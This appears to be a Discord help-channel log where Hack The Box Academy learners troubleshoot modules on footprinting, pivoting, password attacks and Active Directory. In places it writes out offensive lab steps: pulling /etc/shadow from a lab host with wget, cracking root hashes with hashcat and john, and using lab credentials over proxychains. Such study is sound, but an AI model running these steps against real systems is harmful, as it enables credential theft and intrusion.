slender shoal
#

It tricked me up too haha. No worries

minor cave
swift forge
#

Anyone familiar with Intro to Windows Command Line module? I'm on the Finding Files and Directories page, and trying to find the waldo.txt file. I've tried several ways to input the "where" command and I'm either getting absolutely no response from the command or I'm getting an error message for the command.

lusty thicket
#

dir -recurs -filter waldo.txt -path / | select fullname

#

try

swift forge
#

Able to find out, not sure why the process that it describes in this page doesn't work at all

tender acorn
#

on diferent points in the academy i found the real companys webside inlanefreight.com. It use sumtime the real website sumetime the included exploiteble mirrow.

My Question WHY?

is inlanefreight a fake company for testing or a they alowing do this?
its strange

acoustic owl
fathom pendant
#

they have to have some of the info be believable enough, purely due to some of the engagements

tender acorn
#

thanks @acoustic owl and @fathom pendant

granite garden
#

Hello, i'm a supernewb so apologies if im on the wrong channel. I am having trouble understanding a part of LINUX FUNDAMENTALS , specifically Find Files and Directories. "If we hover the mouse over the respective options, a small window will appear with an explanation." Where do I hover? I've tried to hover over the commands in the command line, both before and after entering the command. I've also tried to hover over the green words on HTB Academy, and the commands above and below where this sentence is located. I don't have very good internet, so I have waited 1-3 minutes on each hover attempt. Any help would be greatly appreciated.

fathom pendant
#

It's referring to the GUI

#

not to CLI

sly dome
#

Attacking ColdFusion: shell never reaches me xd

#

anyone has experienced that

granite garden
#

Thanks to #MarieLee

#

sorry I meant thank you @fathom pendant

sly dome
#

why the heck using os.getenv() on Python3 messes up the string with some random color

#

wtf is that behaviour

smoky vortex
# lusty thicket yes

WTF, It works on pwnbox, but shows the completely different result on VM. Are there any other labs with the same jokes?

proven pasture
#

Hello, folks. I have been working on Intrusion Detection With Splunk for a while now. I was able to answer all of the questions except for Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the two IP addresses of the C2 callback server. Answer format: 10.0.0.1XX and 10.0.0.XX
Can anyone please provide some guidance?

fathom pendant
buoyant valve
balmy radish
#

Last I checked the vip sub didn’t include academy. Check the page detailing the subscription and payment options to find one that meets your needs

#

They have an annual sub, a monthly cube sub, and a student plan

proven pasture
lusty thicket
orchid pine
#

have anyone doen the thichh apllication section on attack appllication module jus i have a question after delting the hashs from the manifest files and changing the port and rebuilding the app you guys could lunch the client

#

what a stupid section

frank sand
#

Module: Pivoting, Tunneling and Port Forwarding skills assessment: I've successfully pivoted to the second to last box via RDP, but all I can find is an old flag.txt? Any help would be much appreciated!

next ledge
#

Can someone help with AD Enum & Attack Skills 2 > Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?

I was not able to get a clear txt password, but was able to get onto ms01 with a service account by PTH. I am not sure if I missed something.

next ledge
thorn urchin
lusty thicket
#

no route to host means you aren’t connected to the academy vpn

next ledge
#

Thank you I was asking about getting further along. I read were people got that password wasn’t sure if I needed to try and crack the hash.

thorn urchin
#

then whyd you ask about an unrelated question

lusty thicket
#

what section is that?

thorn urchin
#

you either think you are but you're not or you have the wrong IP

#

What bruh?

#

You dont have a path to the host

#

cool so youre connected to A vpn

lusty thicket
#

looks like the academy vpn FeelsWeirdMan

#

reset the machine and try again

thorn urchin
#

screenshot the connection information from where you spawned the machine

#

so you must rdp, ssh is a no go

lusty thicket
#

restart your pc and try again

fathom pendant
#

also don't run xfreerdp as root; it doesn't properly have a display variable set to use the display

bright quiver
#

i am working on the password attack module for password/shadow/opasswd portion and trying to ffile transfer but when i run http server and run this command : wget http://10.129.202.64:8000/etc/shadow.txt -o shadow2.txt or wget http://10.129.202.64:8000/etc/shadow -o shadow2.txt I get this error but it still downloads. Error 10.10.14.189 - - [05/Dec/2023 19:54:20] code 404, message File not found
10.10.14.189 - - [05/Dec/2023 19:54:20] "GET /etc/shadow.txt HTTP/1.1" 404 - isn't etc/filename the directory it is pulling from?

fathom pendant
#

you can't just arbitrarily choose a different directory

lusty thicket
#

strange man

bright quiver
#

@fathom pendant i am running form here: will@nix01:/etc$ python3 -m http.server

thorn urchin
#

which section are you doing

#

specifically

fathom pendant
proven pasture
#

@fathom pendant I am sorry to bother you, but I am still stuck on this darn Splunk question

fathom pendant
#

I haven't done this module

#

read the section again and try and figure it out

bright quiver
#

@fathom pendant so it runs and i get this

||10.10.14.189 - - [05/Dec/2023 19:59:12] "GET /shadow.txt HTTP/1.1" 404 -
10.10.14.189 - - [05/Dec/2023 20:00:04] code 404, message File not found
10.10.14.189 - - [05/Dec/2023 20:00:04] "GET /shadow.txt HTTP/1.1" 404 -||

and i get a file on my system called shadow2.txt, but not much really in it. even when removing the etc directory as such - wget http://10.129.202.64:8000/shadow -o shadow2.txt

is there a better way to transfer the files for this

fathom pendant
#

wget should be fine, but I think you should be getting some .bak files instead

thorn urchin
#

shadow.txt doesnt exist there

fathom pendant
#

so even with an outputfile if it's empty you'll just get a blank output file

#

¯_(ツ)_/¯

bright quiver
#

@fathom pendant just tried a locate for passwd and find the bak ones in the different spot

fathom pendant
#

yes

thorn urchin
#

congrats, now run the web server there

fathom pendant
#

that's intentional lol

lusty thicket
#

awesome

analog dock
#

Theres a YouTube vid and a post about double pivoting, very easy to follow

rustic sage
#

What’s the difference between “nmap -sV { ip address} “ and “ nmap -p {ip address}”

fathom pendant
#

well first off if you just do -p it's gonna probably throw an error, did you mean -p-?

rustic sage
#

Yes

fathom pendant
#

-p- differs from a standard scan by scanning all 65k ports

#

a normal scan without specifying only scans the top 1000

#

the -sV flag simply tacks onto the scan to check for version of the service running

#

notably it isn't 100% reliable

rustic sage
#

Ok thanks

fathom pendant
#

you also generally wanna run nmap with sudo

#

because of some port binding shenanigans

#

and protocol stuff

frank sand
#

@lusty thicket I’m on the second to last question on the skills assessment for Pivoting and Tunneling. I used v*****’s pass to RPD into the next pivot but I can’t find the flag

fathom pendant
#

iirc this one has access to some interesting files ;)

dreamy solar
#

Excuse me where is Scanner ZAP ? for this exercice (excuse me I make htb exercices since this morning fatigue has been felt

gray chasm
#

Does anyone know what needs to be done to be able to speak on the community-content channel?

wanton jasper
#

I have an issue on Attacking Common Services - Attacking FTP
https://academy.hackthebox.com/module/116/section/1165

I brute forced and got a user an PW but it is the creds for the section after, SMB. I got tired of waiting on the brute so I started plugging in user names and found the correct user that starts with "R" but I cant find creds for her using the provided word list and I cant ssh with her to get the flag

#

and rockyou plans on taking 1078:11h

gray chasm
#

What do you mean by the published article?

gray chasm
sly kelp
gray chasm
fathom pendant
wanton jasper
#

nevermind, found a second pw list

fathom pendant
#

it helps to learn how to read

languid galleon
#

why can't we "spend cubes" to get a look at a walkthrough video? i've been stuck on some thing for weeks but my only hope is for someone on discord to be nice enough to give me a nudge in the right direction, which is cool but I want to understand the lesson more than I want the answer. Sorry for venting but atp, f julio and this last PtH question lol

sly kelp
fathom pendant
#

for the most part, if you follow the section - you should be able to answer the questions

#

you likely overlooked something

sly kelp
#

I remember that during that module I got the admin hash, rather than using it as PTH I was cracking it for password

#

So some days are like that

fathom pendant
#

the last PtH question, i'm assuming you mean the Linux01$ ticket?

sly kelp
fathom pendant
#

i suggest downloading and transferring the tool shown in the section to see where all the tickets are; hint: Linux01$ is in a different directory than the others

languid galleon
#

Thanks. I'm a million percent sure I'm overlooking something easy but its frustrating that I don't know what haha ... I think I've read every "How to PtH" article on teh internet haha

fathom pendant
#

everything you need is honestly in the section

#

¯_(ツ)_/¯

sly kelp
#

I finally reached 95%

#

Having a full time job and university makes things hard for cpts

silk prism
#

Apply the concepts taught in this section to obtain the password to the Vendor user account on the target. Submit the clear-text password as the answer. (Format: Case sensitive) im currently working on this question and i have the answer. i want to make sure that is right because its not going thru as right on the plataform. thanks in advance!

sly kelp
#

.make sure there no blank space

fathom pendant
languid galleon
#

Once I'm off from work I'll post my steps and properly ask for a hint. Thanks

fathom pendant
#

but yeah as Shinobi said, make sure no spaces before and after

fathom pendant
lusty thicket
silk prism
#

Idk I can send it to someone to double check that I have the right answer

fathom pendant
#

what module is this for?

silk prism
fathom pendant
#

try refreshing the page and resubmitting

#

if it's the one i'm thinking it starts with a p

#

but without more info; can't help you

silk prism
#

I will let it cool down for a little bit and come back at it later

#

But thanks for the help guys!

fathom pendant
#

Still didn't answer the question of what module

#

so someone can actually help you

soft plume
#

Hi I'm having a problem with the active information gathering module where when I use the command ||curl -I "http://${TARGET}"|| with the target being app.inlanefreight.local, I get the output of: curl: (6) Could not resolve host: app.inlanefreight.local. I'm currently lost and I have read through the other posts in the channel and none of the solutions have helped me. (edited) I just found the answer if you just try www.inlanefreight.com. Anyone know why it wont let me use the app.inlanefreight.local

fathom pendant
#

because app.inlanefreight.local isn't a public website

#

you'd need to add an IP and the site to your /etc/hosts

soft plume
#

I just read that off of the forums and did so, which it it worked. I appreciate your help though :)!

green glade
#

do you need a htb acc to verify or htb academy acc to verify

fathom pendant
green glade
#

aii

lusty thicket
soft plume
lusty thicket
zenith acorn
#

need fing help with ATTACKING COMMON APPLICATIONS
Attacking Applications Connecting to Services

when i break at this point 0x0000000000001607 <+433>: call 0x11b0 SQLDriverConnect@plt

#

its not working

#

cannot access memory

#

i know why

#

its not a cirrect adress

#

but hy i dont see the 5555

#

before it

#

i got the credntials only because i used the adress given in the example

#

HELP

#

so the question is why is my gbd not showing the full memory address?

#

never mind

#

found the correct one...

cedar void
#

I can't understand why the command 'proxychain remmina' is not opening up a windows desktop . I thought that is what that command was supposed to do.

"Using the concepts taught thus far, connect to the target and establish an ICMP tunnel. Pivot to the DC (172.16.5.19, victor:pass@123) and submit the contents of C:\Users\victor\Downloads\flag.txt as the answer. "

https://academy.hackthebox.com/module/158/section/1438

acoustic owl
#

If I can see this correctly on the print screen, then remmina opens. Now you just have to enter the IP and creds.

languid galleon
# fathom pendant read the section again carefully, make sure to utilize all the tools shown

I actually just completed it. ||My issue was that I tried to run the smb ps but it yelled at me so I put .\ and the extension on it. It didn't yell at me but it didn't give me a PID either. Me being LAZY I just switched SMB with WMI and ran it again. Again, it didn't bark at me but again I didn't get a PID. After rereading the module for the 50leven time I finally caught my mistake - removing the '.' and extension from my command finally gave me a connection. I think venting in here was the real answer haha.||

cedar void
acoustic owl
rustic sage
#

Currently on the File Upload Vulns module, and I have to run an intruder that will take around 6000 requests...

#

This is obviously not doable with the community edition, any ideas?

lusty thicket
rustic sage
cedar void
lusty thicket
rustic sage
lusty thicket
rustic sage
#

Where you have to adjust File extension, Content type and MIME type

lusty thicket
rustic sage
lusty thicket
#

focus on trying double extensions and using the GIF8 mimetype

#

that’s it

rustic sage
#

Will do, thank you

lusty thicket
zenith acorn
#

nothing else work use magic bro

#

other section i think btw

#

dont pay no imind to me hahaha

silk prism
fathom pendant
silk prism
#

i got the right one, it might be another issue

#

i will see what i can do thanks for the confirmation again

cedar void
flat copper
#

Anyone on Intro to Assembly Language and wanna chat??

cedar void
#

You started that course?

simple barn
#

Hi there, I need help with something related HTB module, shells and payloads live engagment. For this task, when connecting using xfreerdp to the initial foothold, I couldn't find a browser installed, is this done on purpose or something else is wrong ?

flat copper
cedar void
flat copper
#

I'd say high end of easy to mid level medium. I think Im starting to wrap my head around WHAT is happening, not exactly sure HOW it is happening tho.

#

Now that Im kinda thinkin out loud, probably more into the medium than easy honestly. I feel like I'm on the brink of something clicking in my brain tho

twin ocean
#

I’m doing “Linux Fundamentals” atm. Can someone explain what redirecting STDIN actually does. I’m not sure what the difference is between
cat test.txt
&
cat < test.txt

lusty thicket
#

in the first example you’re reading the test.txt file directly in the second example you’re taking the test.txt input and feeding it to the cat cmd

flat copper
#

^ This

small sparrow
#

Hellow everyone, a question, when I spawn a lab target, am I the only one who can access it or other students also have access to that?

fathom pendant
#

yes, only you have access to that target

small sparrow
#

thank you!

short hare
#

I don't know where to say but
Where I can report a typo of a module??

steady dust
#

Hello. In the module ACL Enumeration from Active Directory Enumeration & Attacks, on the last question, the Get-DomainObjectACL from Powerview it's taking too long to run. I mean after 15 minutes, it's still running. I restarted the machine, waited 10 minutes for everything to start, but it's taking too long and I don't know why.

next bronze
steady dust
next bronze
#

tried using bloodhound?

steady dust
orchid pine
#

did anyone complete the attack common application befor the 03/2023

next bronze
#

check your lhost

next bronze
rough tree
#

Did anyone managed to get the flag from the Bypassing CSRF Tokens via CORS Misconfigurations(Advanced XSS and CSRF Exploitation module)? Seems like the code from the class is not working as I can't promote the lowpriv user to Admin and get the missing flag :/

orchid pine
#

attack common application

#

anyone faced thsi issue befor

orchid pine
# orchid pine

can anyone explainn why i need to run the cmnd twice to see the other dump

languid wharf
#

Hey, I'm stuck on the medium lab of the Footprinting module. Can someone help? I'll share what I already found privately

analog dock
languid wharf
#

Got stuck with the creds for sa, but I just tried the password as the Administrator and it worked so i'm fine for now. Thanks anyways!

rare swan
#

Module:Attacking common applications Section:WordPress - Discovery & Enumeration --------im stuck on finding the flag.txt file -- fuzzed all directories with no success, tried brute-force admin, WordPress Plugin Event Registration 5.4.3 - SQL Injection -- what can i do? any hint?

proven panther
#

Doing the getting started module on the public exploits section, when i get to the end and try to use the exploit i just get this as the output: [msf](Jobs:0 Agents:0) auxiliary(scanner/http/wp_simple_backup_file_read) >> run

[] Scanned 1 of 1 hosts (100% complete)
[
] Auxiliary module execution completed

#

Anyone know why i'm not getting anything?

fathom pendant
proven panther
fathom pendant
#

are you sure it's the right filepath, what happens when you leave it as default

proven panther
#

I get the same output if i leave it as the /etc/passwd

fathom pendant
#

then something is wrong with your OPTIONS part

proven panther
fathom pendant
#

type options in the msfconsole

#

your RHOSTS should just be an IP

#

not IP:PORT

#

just the public x.x.x.x

proven panther
#

oh right, yes it looks fine, rhosts is just the ip, rport is just the port and filepath is just/flag.txt

fathom pendant
#

literally just ran it myself and got it the answer

#

when it's run it will save it to a loot file

#

in ~/.msf4/loot/

#

or ~/.msf/loot/

#

if you scroll up does it give you a line like
[+] File Saved In:

proven panther
#

can i dm you so i can send a screenshot?

fathom pendant
#

sure

#

your filepath is wrong

#

read the question again

proven panther
#

oh woops that was just a typo when i redid it to get a clearer screenshot

#

making it /flag.txt doesnt solve it

lusty thicket
fathom pendant
#

as an intro module: they're really just showing off an example

bright quiver
#

can anyone lend some advice on this? trying to run hashcat against the root encrypted pw found for the password attack/password/shadow/opasswd module....still not working...i can show the hash i have but it beings with this ||$6$Xe|| and ends with the bin/bash

fathom pendant
bright quiver
#

@fathom pendant ah ok - let me try

fathom pendant
#

the rest is just the home and default shell interpreter

bright quiver
#

gotcha...those little things make a difference - thanks for the tip

fading field
#

try putting single quotes around 'htb-student'

lusty thicket
manic terrace
#

In Linux Fundamentals, there's a question asking to find a path to htb-student's mail... There was nothing that talked about mail in the section and there is nothing in the home directory. What is this question talking about?

fathom pendant
manic terrace
#

oh, wow that's really useful. Thanks!

rare swan
#

Module:Attacking Web Apps Section:WordPress - Discovery & Enumeration ---- any hint how i can find the flag.txt file?

simple oracle
#

anyone who can help me..

#

any mods or someone else

bright quiver
#

@fathom pendant - so i made it stop at the end here ||qhXg.|| and then ran this - ||hashcat -m 1800 -a 0 root.txt /usr/share/wordlists/mut_password2.list.txt -o crack.txt|| and these : ||hashcat -m 1800 -a 0 -o root.txt /usr/share/wordlists/rockyou.txt -O

john --wordlist=/usr/share/wordlists/rockyou.txt root.txt||

but still get nothing cracked correctly with either....i know something may be off but can figure out what it is. Any help on what may be messing up here?

fathom pendant
#

nvm it should be

bright quiver
#

yeah...i can't quite figure out the issue

fathom pendant
#

just take one line at a time

#

¯_(ツ)_/¯

bright quiver
#

ok

fathom pendant
#

you can also try recreating the file

bright quiver
#

is the part i need also including of the portions after the "." in the full download of the encrypted hash?

fathom pendant
#

i don't recall needing to do anything really extra with it

bright quiver
#

or just the first portion up the the first period

fathom pendant
#

first period?

bright quiver
#

i don't recall that being an issue but...yeah... ||zOu.cVaww01u.6dS||

fathom pendant
#

you need the full thing

#

the only delimiter for the hash is the :

simple oracle
#

helo @fathom pendant do you know how to register our university on university ctf

bright quiver
#

that's what i thought...let me retry some other things...and should i use the mutated list or can i just use rockyou?

fathom pendant
#

mutated list

bright quiver
#

ok

#

@fathom pendant - ok finally got it figured out - i recreated the txt file - then i ran this ||hashcat -m 1800 -a 0 --show -o nice.txt root.hash /usr/share/wordlists/mut_password2.list
chmod 600 nice.txt
cat nice.txt|| - not sure why, but it worked and got the PW

limber river
#

hello , I am in Cron job abuse Linux privilege escalation , I found the flag . But still not sure how can I find the cron job using pspy ? can someone please explain ?

tranquil axle
#

Pspy shows you whenever a new process starts and with what parameters. If you let it run for a while and a cronjob runs during that time then it will show up in the output

#

If you let it run longer it’ll show up several times and then you know it’s some kind of cronjob and you can check if you can abuse it somehow

slate creek
#

Hi can you please help me with this, AD assessment part Submit the contents of the flag.txt file on the Administrator desktop on MS01. I have chiser setup as well, but ping sweep via proxychains takes too long. how did you found the IP of the MS01? and how did you connect? I spent 1 day on this and gonna die tonight 😄

slate creek
slate creek
# lusty thicket `ping MS01`

no way!!! I am giving up on this career bro! I was tinkering for whole day about how to proceed but didn't ping once!!!

lusty thicket
#

or through dns resolution

fathom pendant
#

at a more fundamental level it's because they're in the same network structure and share a DNS server that has it mapped

slate creek
#

right! thanks guys!

lusty thicket
slate creek
lusty thicket
next bronze
#

I wish that one day academy will have servers in the east kekhands

heavy pecan
#

Hi everyone [Footprinting Lab - Medium]

I've already got access to rdp and logged into the Microsoft SQL management server
Bit confused what to do next

fathom pendant
#

that's literally it just fuck around and you'll find it

lusty thicket
languid wharf
#

Hi everyone, I need help with the footprinting hard lab. Stuck on snmp enum.

fathom pendant
#

step 2: make sure not to overlook the result

languid wharf
#

I've tried using snmpwalk but the snmp version on the box is v3 which requires authentication

fathom pendant
#

["Community String"]

#

i don't recall that being the case

lusty thicket
fathom pendant
#

^

languid wharf
#
161/udp open  snmp    udp-response ttl 63 net-snmp; net-snmp SNMPv3 server
| snmp-info: 
|   enterprise: net-snmp                                                        
|   engineIDFormat: unknown                                                                                                                                     
|   engineIDData: 5b99e75a10288b6100000000
|   snmpEngineBoots: 10                                                                                                                                         
|_  snmpEngineTime: 24m31s            

That's what nmap says, I also don't think it's supposed to be the case

fathom pendant
#

nmap can be wrong; but also did you try using other tools

#

do you have the community string?

lusty thicket
languid wharf
#

I'll check thanks

languid wharf
fathom pendant
#

start there

languid wharf
#

Can I dm you?

fathom pendant
#

no

#

because it will just end up you asking me to just walk you through step by step

#

re-read the snmp section on what all tools are available

#

once you get the community string; using another tool you get the next step for foothold

grizzled schooner
#

Marcie, do you have a second to help w mssqlclient?

hexed tinsel
#

#KALI_r223475&

fathom pendant
grizzled schooner
#

ah alright, I just can't figure out how to install it... I ran impacket-ms tab and it filled in mssqlclient, but I went to run it for mssql footprinting mod and it's throwing a bunch of traceback stuff, I'm just not sure if I have to install it or something?

fathom pendant
#

if it's autocompleting: it's installed

#

you might need to run it with python3 but otherwise user error most likely

grizzled schooner
#

might be a silly question, but do I have to run the .py in the directory it's installed in?

fathom pendant
#

you shouldn't have to

#

i also never have had to add impacket- prefix though

#

i've always been able to just run mssqlclient

#

¯_(ツ)_/¯

grizzled schooner
#

does any of this help? I'm not really familiar with traceback errors(?) to know how to fix this

languid wharf
fathom pendant
#

the tool that references OID is pretty generic and catchall for this

languid wharf
#

Okay, thank you!

fathom pendant
#

you're gonna learn better by just trying and failing instead of not trying and asking

fathom pendant
grizzled schooner
#

alright, no worries, thanks for trying!

fathom pendant
#

much more lightweight and less resource intensive

grizzled schooner
#

I used Kali a couple of times... I went to parrot once, haven't gone back since

#

I will say that for me personally, it has given me some trouble installing certain things, but generally speaking it was easy to fix

fathom pendant
#

I wouldn't recommend overwriting your current vm with a fresh install

#

unless you're running baremetal then RIP

grizzled schooner
#

yeah I'm on a live boot lol... Had an old PC laying around figured I'd put it to use

heavy pecan
grizzled schooner
#

but chatgpt was saying that the traceback says either version incompatibility or library installation issue lol

fathom pendant
#

using chatGPT for troubleshooting is really a crapshoot; as it's not a search engine

grizzled schooner
#

yeah I don't know the truth to the statement, but that's just what it was giving me, I'm running an update && upgrade and I'll see what happens

fathom pendant
#

upgrading to 6.3 is annoying

#

if you're in the Parrot Discord there's steps to make it work properly

grizzled schooner
#

I thought that's what I installed for my live boot was 6.3 tbh

fathom pendant
#

5.3 is the current download

#

6.5 is the current live test version after update & upgrade

#

(also do parrot-upgrade as it wraps stuff together)

grizzled schooner
#

At this point, almost seems like running a fresh install may be worth, but I'll do that and see what happens

#

oof 2378 packages can be upgraded lmao

fathom pendant
#

yeah because it's a whole kernel upgrade

#

parrot 6.5 is on deb12

grizzled schooner
#

I mean it ran quick lol

#

yeah mssql still being a pita, I'm just gonna purge it and reinstall it, it's sudo apt install impacket (right?)

fathom pendant
#

¯_(ツ)_/¯

#

probably not since it's a whole suite (Just google it)

#

it's python3 -m pipx install impacket

grizzled schooner
#

weird I found sudo apt install python3-impacket

fathom pendant
#

that probably also works

#

i'm just looking at official documentation ¯_(ツ)_/¯

grizzled schooner
#

yeah I found that on Kali.org, so who knows lmao, lots of ways to do anything anymore

fathom pendant
#

pen test distros still contain a good amount of tools the Bug Bounties has

fathom pendant
grizzled schooner
#

yeah running off of that worked and fixed it

#

just annoying that I have to navigate to the installation directory to run the .py

fathom pendant
#

you can probably add them to your $PATH ¯_(ツ)_/¯

grizzled schooner
#

at least I think it worked lol

languid wharf
#

@fathom pendant Finished it, wasn't hard at all. Something about SNMP just doesn't sit right. I think I'll go over the module again. Thanks for the help

fathom pendant
#

that's all

#

when you run braa it tells you explicitly the version

languid wharf
#

I ran it and it didn't give different results

fathom pendant
#

When I ran the tool using the OID method; it told me SNMP version 2

#

¯_(ツ)_/¯

grizzled schooner
#

||python3 mssqlclient.py backdoor@<ip> -windows-auth||

[*] Encryption required, switching to TLS
[-] [('SSL routines', '', 'no protocols available')]

trying to login to MSSQL with the credentials for foot-printing module.

languid wharf
fathom pendant
#

¯_(ツ)_/¯

fathom pendant
grizzled schooner
#

no such file or directory on pwnbox

fathom pendant
#

no need for directory

grizzled schooner
#

command not found

#

nvm had typo, but yes works on pwnbox

fathom pendant
#

i was gonna say

grizzled schooner
#

lolll

fathom pendant
#

i was JUST able to check it on pwnbox

#

also don't forget to turn off the vpn on your system

#

:P network collisions be fun

grizzled schooner
#

im just confused on why it doesn't work on my live boot then, I went through a fresh install... got to entering password, and then it shoots and error about encryption required and no protocols available

echo roost
thorn field
#

hi, is there any ctf for us, that are not on UNI

#

and how to enter without a teeam ?

fathom pendant
#

That's completely unrelated to this channel my guy

#

and at the moment there's no public hosted ctfs by HTB planned for end of year

fringe crystal
#

Has anyone done the PASSWORD ATTACKS module ? I am stuck on the 5th question of the "Pass the Ticket (PtT) from Linux" section ...

Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.

I got the AES256 hash but don't know what to do with it

thorn field
#

here i see plenty

slender shoal
thorn field
#

is there another room ,for such question pls ?

slender shoal
compact patrolBOT
final mica
#

what are some things i can do if my target is not spawning? My targets spawn under different sections in the same module but not the one i am working on

fringe crystal
#

I got it

#

I really don't understand your suggestion

lusty thicket
hazy grotto
#

I think i need to delete everything impacket related and reinstall.. I'm having trouble with scripts working

#

Problem is... Ive tried and it would seem like impacket is still there and so are all the scripts

viscid zenith
#

Why is Zipping down? It was already resetted twice

#

4 resets, nothing happens

#

great, it is up again

bright quiver
#

can someone DM me about the 2nd to last question in password attacks - pass the ticket with linux? I have julio flag from file but it isn't working

#

can someone let me know what or where to go from here

woven void
#

Hi all. I am greatly interested in learning Coding , hacking etc.
Is there any tutor or any suggestor who can teach me coding or hacking etc?

compact patrolBOT
fathom pendant
woven void
fathom pendant
#

my brother in christ

#

you will need to learn on your own

#

ok and?

#

this really isn't the chat for this

woven void
fathom pendant
#

literally read the linked article